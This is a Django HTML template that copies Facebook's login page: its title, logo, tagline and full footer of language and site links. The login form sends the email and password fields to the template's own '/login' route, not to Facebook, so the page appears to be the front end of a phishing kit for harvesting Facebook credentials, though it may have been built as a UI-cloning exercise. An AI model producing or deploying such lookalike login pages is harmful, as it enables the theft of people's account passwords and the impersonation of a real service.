{% load static %}

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook - log in or sign up</title>
    <link rel="stylesheet" href="{% static 'style.css' %}" />
  </head>
  <body>
    <div class="container">
      <div class="header">
        <div class="left">
          <img
            src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
            alt=""
            class="logo"
          />
          <p>Connect with friends and the world around you on Facebook</p>
        </div>
        <div class="right">
          <form action="/login" method="post">
            {% csrf_token %}
            <input
              type="text"
              id=""
              name="email"
              placeholder="Email or phone number"
            />
            <input type="password" id="" name="password" placeholder="Password" />
            <button class="login" type="submit">Log In</button>
            <span>
              <a href="">Forgot password?</a>
            </span>
            <hr />
            <button class="create">Create new account</button>
          </form>
          <p align="center">
            <strong>Create a Page</strong> for a celebrity, brand or business.
          </p>
        </div>
      </div>
      <div class="footer">
        <div class="_95ke _8opy">
          <div
            id="pageFooter"
            data-referrer="page_footer"
            data-testid="page_footer"
          >
            <ul
              class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i"
              data-nocookies="1"
            >
              <li>English (US)</li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://az-az.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("az_AZ", "en_US", "https:\/\/az-az.facebook.com\/", "www_list_selector", 0); return false;'
                  title="Azerbaijani"
                  >Azərbaycan dili</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://tr-tr.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("tr_TR", "en_US", "https:\/\/tr-tr.facebook.com\/", "www_list_selector", 1); return false;'
                  title="Turkish"
                  >Türkçe</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://ru-ru.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("ru_RU", "en_US", "https:\/\/ru-ru.facebook.com\/", "www_list_selector", 2); return false;'
                  title="Russian"
                  >Русский</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="rtl"
                  href="https://ar-ar.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("ar_AR", "en_US", "https:\/\/ar-ar.facebook.com\/", "www_list_selector", 3); return false;'
                  title="Arabic"
                  >العربية</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://de-de.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("de_DE", "en_US", "https:\/\/de-de.facebook.com\/", "www_list_selector", 4); return false;'
                  title="German"
                  >Deutsch</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://fr-fr.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("fr_FR", "en_US", "https:\/\/fr-fr.facebook.com\/", "www_list_selector", 5); return false;'
                  title="French (France)"
                  >Français (France)</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="rtl"
                  href="https://fa-ir.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("fa_IR", "en_US", "https:\/\/fa-ir.facebook.com\/", "www_list_selector", 6); return false;'
                  title="Persian"
                  >فارسی</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://ka-ge.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("ka_GE", "en_US", "https:\/\/ka-ge.facebook.com\/", "www_list_selector", 7); return false;'
                  title="Georgian"
                  >ქართული</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://es-la.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("es_LA", "en_US", "https:\/\/es-la.facebook.com\/", "www_list_selector", 8); return false;'
                  title="Spanish"
                  >Español</a
                >
              </li>
              <li>
                <a
                  class="_sv4"
                  dir="ltr"
                  href="https://pt-br.facebook.com/"
                  onclick='require("IntlUtils").setCookieLocale("pt_BR", "en_US", "https:\/\/pt-br.facebook.com\/", "www_list_selector", 9); return false;'
                  title="Portuguese (Brazil)"
                  >Português (Brasil)</a
                >
              </li>
              <li>
                <a
                  role="button"
                  class="_42ft _4jy0 _517i _517h _51sy"
                  rel="dialog"
                  ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more"
                  href="#"
                  title="Show more languages"
                  ><i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i
                ></a>
              </li>
            </ul>
            <div id="contentCurve"></div>
            <div
              id="pageFooterChildren"
              role="contentinfo"
              aria-label="Facebook site links"
            >
              <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                <li>
                  <a href="/reg/" title="Sign Up for Facebook">Sign Up</a>
                </li>
                <li><a href="/login/" title="Log into Facebook">Log In</a></li>
                <li>
                  <a href="https://messenger.com/" title="Check out Messenger."
                    >Messenger</a
                  >
                </li>
                <li>
                  <a href="/lite/" title="Facebook Lite for Android."
                    >Facebook Lite</a
                  >
                </li>
                <li>
                  <a
                    href="https://www.facebook.com/watch/"
                    title="Browse our Watch videos."
                    >Watch</a
                  >
                </li>
                <li>
                  <a
                    href="/places/"
                    title="Check out popular places on Facebook."
                    >Places</a
                  >
                </li>
                <li>
                  <a href="/games/" title="Check out Facebook games.">Games</a>
                </li>
                <li>
                  <a
                    href="/marketplace/"
                    title="Buy and sell on Facebook Marketplace."
                    >Marketplace</a
                  >
                </li>
                <li>
                  <a
                    href="https://pay.facebook.com/"
                    title="Learn more about Meta Pay"
                    target="_blank"
                    >Meta Pay</a
                  >
                </li>
                <li>
                  <a
                    href="https://www.meta.com/"
                    title="Check out Meta"
                    target="_blank"
                    >Meta Store</a
                  >
                </li>
                <li>
                  <a
                    href="https://www.meta.com/quest/"
                    title="Learn more about Meta Quest"
                    target="_blank"
                    >Meta Quest</a
                  >
                </li>
                <li>
                  <a
                    href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2jr7KWbl4xKZaFErhQvIo5FJG4_nIRvneqEPf3EKdOKeQbrYukZyi_6elALK5nTMuN9B5vii7yNcOLvi4aaPGAbA_uw16TUwfDJvcUtus4NkTtM9aSjymOiTimHNfesDH3UZejHIfK779OHlrNrw"
                    title="Check out Instagram"
                    target="_blank"
                    rel="noopener nofollow"
                    data-lynx-mode="asynclazy"
                    >Instagram</a
                  >
                </li>
                <li>
                  <a
                    href="https://www.bulletin.com/"
                    title="Check out Bulletin Newsletter"
                    >Bulletin</a
                  >
                </li>
                <li>
                  <a href="/fundraisers/" title="Donate to worthy causes."
                    >Fundraisers</a
                  >
                </li>
                <li>
                  <a
                    href="/biz/directory/"
                    title="Browse our Facebook Services directory."
                    >Services</a
                  >
                </li>
                <li>
                  <a
                    href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
                    title="See the Voting Information Center."
                    >Voting Information Center</a
                  >
                </li>
                <li>
                  <a
                    href="/privacy/policy/?entry_point=facebook_page_footer"
                    title="Learn how we collect, use and share information to support Facebook."
                    >Privacy Policy</a
                  >
                </li>
                <li>
                  <a
                    href="/privacy/center/?entry_point=facebook_page_footer"
                    title="Learn how to manage and control your privacy on Facebook."
                    >Privacy Center</a
                  >
                </li>
                <li>
                  <a href="/groups/discover/" title="Explore our Groups."
                    >Groups</a
                  >
                </li>
                <li>
                  <a
                    href="https://about.meta.com/"
                    accesskey="8"
                    title="Read our blog, discover the resource center, and find job opportunities."
                    >About</a
                  >
                </li>
                <li>
                  <a
                    href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto"
                    title="Advertise on Facebook."
                    >Create Ad</a
                  >
                </li>
                <li>
                  <a
                    href="/pages/create/?ref_type=site_footer"
                    title="Create a page"
                    >Create Page</a
                  >
                </li>
                <li>
                  <a
                    href="https://developers.facebook.com/?ref=pf"
                    title="Develop on our platform."
                    >Developers</a
                  >
                </li>
                <li>
                  <a
                    href="/careers/?ref=pf"
                    title="Make your next career move to our awesome company."
                    >Careers</a
                  >
                </li>
                <li>
                  <a
                    href="/policies/cookies/"
                    title="Learn about cookies and Facebook."
                    data-nocookies="1"
                    >Cookies</a
                  >
                </li>
                <li>
                  <a
                    class="_41ug"
                    data-nocookies="1"
                    href="https://www.facebook.com/help/568137493302217"
                    title="Learn about Ad Choices."
                    >Ad choices<i class="img sp_h4Swrc8tiWJ sx_22044a"></i
                  ></a>
                </li>
                <li>
                  <a
                    data-nocookies="1"
                    href="/policies?ref=pf"
                    accesskey="9"
                    title="Review our terms and policies."
                    >Terms</a
                  >
                </li>
                <li>
                  <a
                    href="/help/?ref=pf"
                    accesskey="0"
                    title="Visit our Help Center."
                    >Help</a
                  >
                </li>
                <li>
                  <a
                    href="help/637205020878504"
                    title="Visit our Contact Uploading &amp; Non-Users Notice."
                    >Contact Uploading &amp; Non-Users</a
                  >
                </li>
                <li>
                  <a
                    accesskey="6"
                    class="accessible_elem"
                    href="/settings"
                    title="View and edit your Facebook settings."
                    >Settings</a
                  >
                </li>
                <li>
                  <a
                    accesskey="7"
                    class="accessible_elem"
                    href="/allactivity?privacy_source=activity_log_top_menu"
                    title="View your activity log"
                    >Activity log</a
                  >
                </li>
              </ul>
            </div>
            <div class="mvl copyright">
              <div><span> Meta © 2023</span></div>
            </div>
          </div>
        </div>
      </div> 
    </div>
  </body>
</html>
